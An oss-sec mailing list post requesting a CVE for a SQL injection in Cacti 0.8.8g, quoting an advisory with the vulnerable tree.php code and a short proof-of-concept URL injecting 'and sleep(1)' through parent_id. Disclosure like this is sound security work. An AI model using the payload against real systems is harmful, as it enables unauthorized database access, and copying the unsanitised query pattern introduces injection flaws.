oss-sec mailing list archives
please assign CVE for cacti bug 2667: SQL Injection Vulnerability
From: Paul Gevers <elbrus () debian org>
Date: Thu, 10 Mar 2016 17:06:32 +0100
Hi I just found the description below about an sql vulnerability in the cacti bug tracker: http://bugs.cacti.net/view.php?id=2667 Can a CVE be assigned for this issue? Thanks ========================== Advisory: Cacti SQL Injection Vulnerability Author: Do9gy of Tencent Security Platform Department Affected Version: 0.8.8.g(the latest version & the older versions) ========================== Vulnerability Description ========================== Recetly, I found a SQL Injection Vulnerability in ‘Cacti-0.8.8g' program, Cacti is widely used in many companies. Vulnerable file: /cacti/tree.php: line 208: ========================================================================================================================================== switch ($current_type) { case TREE_ITEM_TYPE_HEADER: $i = 0; /* it's nice to default to the parent sorting style for new items */ if (empty($_GET["id"])) { $default_sorting_type = db_fetch_cell("select sort_children_type from graph_tree_items where id=" . $_GET["parent_id"]); }else{ $default_sorting_type = TREE_ORDERING_NONE; } ========================================================================================================================================== The parameter parent_id is used without any validation. ========================== POC && EXP ========================== 1. Login 2. http://target/cacti-0.8.8g/tree.php?action=item_edit&tree_id=2&parent_id=8%20and%20sleep(1) [^] 3. mysql log: select sort_children_type from graph_tree_items where id=8 and sleep(1)
Attachment:
signature.asc
Description: OpenPGP digital signature
Current thread:
- please assign CVE for cacti bug 2667: SQL Injection Vulnerability Paul Gevers (Mar 10)
- Re: please assign CVE for cacti bug 2667: SQL Injection Vulnerability Tim Zingelman (Mar 15)
- Re: please assign CVE for cacti bug 2667: SQL Injection Vulnerability cve-assign (Mar 15)